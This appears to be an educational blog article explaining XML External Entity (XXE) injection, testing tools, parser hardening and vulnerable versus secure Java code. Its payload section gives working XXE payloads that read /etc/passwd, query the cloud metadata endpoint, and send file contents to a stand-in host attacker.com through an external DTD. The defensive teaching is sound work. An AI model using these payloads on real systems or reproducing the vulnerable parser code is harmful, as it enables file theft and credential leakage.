XML External Entity Explained: Attack & Defense Guide

In this entry of the Vulnerability Explain series we are tackling XML External Entity injection, or XXE. It is a classic that still shows up in modern apps wherever XML, SOAP, SVG, or office documents are parsed. We will cover what XXE is, how it lets attackers read files and reach internal systems, how to test for it safely, and how to lock your parsers down.

What is XXE?

XXE is a vulnerability in how an application parses XML. The XML standard supports a feature called external entities, which let a document pull in content from an outside source. If the parser processes attacker-controlled XML with that feature enabled, the attacker can define entities that read local files or make network requests.

Think of it like leaving a fill-in-the-blank form where one of the blanks says “insert the contents of this file here.” A poorly configured parser will obediently do exactly that, even if the file is /etc/passwd.

How does XXE work?

XXE works by abusing the document type definition (DTD) and entity features of XML. The path from a friendly XML upload to a full breach usually looks like this:

XML Input Accepted
- The application accepts XML from a user – an API body, a file upload, a SOAP message, or an SVG image.
Parser Allows External Entities
- The XML parser is left in its default or misconfigured state where DTDs and external entities are resolved.
Malicious Entity Defined
- The attacker declares an external entity that points at a local file (file://) or a remote URL (http://).
Entity Resolution
- When the parser expands the entity, it reads the targeted file or sends the request and places the result into the document.
Data Exfiltration or SSRF
- The attacker reads the reflected file contents, or uses out-of-band channels and internal URLs to pivot into the network – effectively turning XXE into SSRF.

So XXE is really about a parser trusting instructions hidden inside the data it was asked to read. Disable those instructions and the attack disappears.

XXE injection diagram showing a malicious XML entity making the parser read /etc/passwd and reach internal services

How XXE works: a malicious external entity makes the XML parser read local files or internal services.

Tools and Techniques for XXE Testing

XXE testing blends careful payload crafting with tooling that helps with blind and out-of-band cases where the response does not echo your data back.

Manual Testing Methodologies

In-Band File Read – Inject an external entity pointing at a known file and check whether its contents appear in the response.
Blind / Out-of-Band Testing – When nothing is reflected, use an external DTD hosted on your server to force the parser to call back to you.
Content-Type Switching – Many JSON APIs silently accept XML if you change the Content-Type header to application/xml; always try it.
File Format Abuse – Embed XXE payloads inside SVG, DOCX, XLSX, or SAML messages, which are XML under the hood.

Automated Scanning Tools

Burp Suite Scanner – Detects in-band and out-of-band XXE, and its Collaborator service is ideal for blind cases.
Nuclei – Template-driven scanner with community XXE templates for fast triage.
XXEinjector – Automates retrieval of files and out-of-band exploitation using various protocols.
oxml_xxe – Helps embed XXE payloads inside office and image file formats.

XXE Protection Mechanisms

Best Practices for Secure Coding

Disable DTDs and External Entities
- Description: Turn off DOCTYPE declarations and external entity resolution in your XML parser.
- Benefits: This single change eliminates the vast majority of XXE.
- Implementation Tip: In Java set FEATURE_SECURE_PROCESSING and disallow doctype-decl; in .NET set XmlResolver to null; in PHP avoid loading untrusted DTDs.
Use Safe Parsers and Data Formats
- Description: Prefer JSON where possible, and use parser libraries that are secure by default.
- Benefits: Reduces the attack surface and removes legacy entity behavior.
- Implementation Tip: Keep parser libraries patched and updated.
Validate and Whitelist Input
- Description: Validate uploaded files against an expected schema before full processing.
- Benefits: Catches malformed or hostile documents early.
- Implementation Tip: Reject any document containing a DOCTYPE if your schema does not need one.

Best Practices for Organizations

Secure Defaults Across Services
- Create a hardened XML parsing library or wrapper that every team must use.
- Ban raw use of default parser configurations in code review.
Network Egress Controls
- Restrict outbound traffic from application servers so blind XXE cannot reach the internet.
- Block access to cloud metadata endpoints from app tiers.
Continuous Testing
- Add XXE checks to SAST and DAST pipelines.
- Re-test any feature that newly accepts XML or office documents.

Top XXE payloads used by Security Researchers

As a security researcher, knowing the most common payloads helps you detect and prevent these attacks. Use this knowledge ethically and only on systems you are authorized to test. Some sample payloads are shown below.

<!-- Classic in-band file read -->
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>

<!-- SSRF / internal port and metadata access -->
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<data>&xxe;</data>

<!-- Blind XXE via external DTD -->
<!DOCTYPE foo [ <!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd"> %ext; ]>

<!-- evil.dtd hosted by the attacker for out-of-band exfiltration -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval; %exfil;

Real-World Example: Reading Server Files Through a SOAP API

A legacy partner integration exposed a SOAP endpoint that accepted XML invoices. The underlying parser was the platform default, which happily resolved external entities.

A tester submitted an invoice whose DOCTYPE defined an entity pointing at file:///etc/passwd. The server echoed a validation error that included the expanded entity – and with it, the full contents of the file. From there the same technique reached the cloud metadata service and leaked temporary credentials.

Remediation was straightforward once spotted: the team disabled DTD processing in the parser and added egress filtering. XXE is rarely about clever exploitation – it is almost always about a parser that was never told to say no.

Vulnerable and secure code of XXE

The following example shows the contrast between vulnerable and secure code for XXE. It helps you see how the flaw creeps into real code and the changes that shut it down.

🥺 Vulnerable Code:

// Vulnerable: default parser resolves external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
// Parses attacker-controlled XML with DTDs and entities enabled
Document doc = db.parse(request.getInputStream());

The factory is left in its default state, so DOCTYPE and external entities are resolved.
An uploaded document can read local files or reach internal services through entities.

😎 Secure Code:

// Secure: disable DTDs and external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(request.getInputStream());

Disallowing DOCTYPE declarations stops the entire class of XXE in one line.
External general and parameter entities are explicitly turned off as defense in depth.

Conclusion

XXE is almost never about clever exploitation – it is about a parser that was never told to say no. The fix is equally direct: disable DTD processing and external entity resolution, prefer safe data formats like JSON, and keep parser libraries patched. Layer on network egress controls so blind XXE cannot phone home, and the vulnerability simply stops working. Treat every place that accepts XML, SVG, or office documents as a parser you must harden before it ever sees user input.

Security Resources

XML External Entity (XXE) Injection